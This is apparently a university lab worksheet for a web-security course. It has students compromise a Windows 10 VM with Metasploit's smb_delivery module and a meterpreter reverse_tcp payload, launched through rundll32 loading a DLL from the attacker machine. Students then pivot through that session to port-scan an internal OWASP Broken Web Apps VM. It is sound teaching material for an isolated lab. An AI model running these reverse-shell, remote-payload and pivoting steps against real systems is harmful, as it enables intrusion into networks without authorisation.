WEEK 7 – TASK P
Pass Task.
Release Date: 26/8-2/9/2024
Learning Outcomes
• Demonstrate compromising web server in the internal network using pivoting
technique
• Implement port scanning for a web server using Metasploit.
• Demonstrate understanding of web server threats and hacking.
• Reflect on Module 7 learning experience.
Instructions
An answer sheet template is available on OnTrack as a `Resources’. Please
download the answer sheet and fill it with your answers. To upload on OnTrack, you need to
convert the answer sheet template document to PDF. MS Word includes built-in PDF
conversation capability.
All questions/tasks that have the icon below must be attempted for you to complete this
task. If screenshots are required, please ensure that text in screenshots is readable.
Remember that troubleshooting technical problems is part of learning in this field. Tasks
are not step-by-step guide. You need to be in the driver seat and learn concepts by doing – as
you would when you start your future job (many times even your supervisor does not know the
answer to problems you face). Do your research patiently to solve issues you face and if you
are stuck:
Help is always available in SIT379/704. Please go to Discussions and ask your questions
about this task in Week 7 P. Also, an extra support and help is provided on IT helphub.
All students are encouraged to participate and help peers with their questions via peer-
support channel on Teams. Helping others is a great way to learn and think about aspects
you may have overlooked. You can also seek help from tutors during online and face-to-
face workshops. Please do not raise your questions through OnTrack, or Email.
Note: This task includes three sections (A, B, and C) that cover different aspects of achieving learning
outcomes. Students will provide evidence of completing tasks and learning and reflect on their learning.
�Hacking Web server in internal network through Windows 10.
In this task, you will attempt to access the OWASP Broken Web Apps using a Windows 10
machine. Since the OWASP Web app's VM is on a different subnetwork and you do not have
a direct connection, you will use the Windows 10 machine as an intermediary. This technique
is known as pivoting. Please refer to Module 4 for a detailed explanation. To proceed, we need
to reconfigure our VMs to be on two different subnetworks. Change the network settings for
the OWASP web apps to connect to "intnet2".
PfSense
WAN:x.x.x.x
eth0: 192.168.1.x
Windows 10
Kali Linux VM
eth0:192.168.1.x
eth0: 192.168.1.x
eth1: 192.168.2.x
OWASP Web Apps VM
eth1: 192.168.2.x
To successfully carry out this attack, you need to enable the old version of SMB in Windows
10. Follow these steps:
1. Type "control" in the search box and select "Control Panel" from the best match.
2. Change the "View by" setting to "Category," then click on the "Programs" section.
3. Click on the "Turn Windows features on or off" link.
4. Expand the "SMB 1.0/CIFS File Sharing Support" section and check the box for
"SMB 1.0/CIFS Client."
5. Click the "OK" button to save the changes and restart your computer.
6. Restart the virtual machine (VM).
1. On your Kali machine, open Metasploit and then enter the following commands:
a. use exploit/windows/smb/smb_delivery
b. set payload windows/meterpreter/reverse_tcp
c. set LHOST “Kali machine IP address”
d. set LPORT 1337
f. exploit
� smb_deliver serves payloads via an SMB server and provides commands to retrieve
and execute the generated payloads. Currently supports DLLs and Powershell.
2. To execute the command provided by Metasploit, follow these steps on a Windows 10
machine: 1) Open the Run dialog by pressing Win + R. 2) Enter the following command:
undll32.exe \\Kali IP address\****\test.dll,0. 3) Press Enter to run the command.
Rundll32.exe is a Microsoft-signed binary used to load dynamic link libraries (DLLs)
in Windows. It is used to evade security measures and perform malicious code (for more
details check: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-
executing-malicious-code)
3. A new session will open with Windows 10. Press Enter, and the Meterpreter shell will
launch. Then, type sessions 1 and press Enter (see Figure).
4. Type "shell" and the Command Prompt in Windows 10 will open. Next, type "ipconfig" to
retrieve the IP address for the internal network. You should see two interfaces listed: one
corresponding to the connection with Kali Linux/pfSense network and the other to the
interface connecting with OWASP Broken Web Apps
5. Once you have the IP address and subnet details for the second network, you can initiate a
ping sweep to identify active devices. This can be achieved using Python or a Batch script.
Since we already know the IP address of OWASP, there is no need to ping all numbers; we
can specifically target that IP to pinpoint the OWASP Broken Web Apps VM's address.
6. As you get the IP address of OWASP Broken Web Apps VM, you should perform port
scanning to get information about running services. Exist from this shell, then type
background to save this session.
7. However, before you perform any port scanning, you should save the route from Kali to
the OWASP Broken Web Apps VM's address route. You can run the following command
“Route add windows 10 IP address/20 1”. Note that the route add command includes the IP
address, the subnet mask and the ID of the meterpreter session (1).
8. Now that you know what systems are on our network and you have a route established to
the compromised machine, the next step is to scan.
Task TA1:T Run “use auxiliary/scanner/portscan/tcp” and specify the RHOSTS and
PORTS (1-500) to perform port scanning. What was the main services running? You must
provide screenshot of the output.
� ask TA2:TIf you want to open the OWASP web apps website remotely in Windows 10
through this Metasploit session. what could you do? provide screenshot of your command
and output. Hint: Use the ”shell”.
Note: If you aim to get a D, please check the D task, as you will continue
the same session.
B. Evidence of learning
Task B1: Provide evidence of your work on module 1. This can contain notes you
took, activities you solved, and any other work you produced. You can scan or take pictures
or screenshots of your work into a pdf document. It is a good idea to include short
comments together with your evidence.
C. Reflecting on the content and your learning
Task C1: Reflect on what you have learned this week. What is the most important
thing you learnt in this module? How does this relate to what you already know? Why do
you think your course team wants you to learn the content of this module?
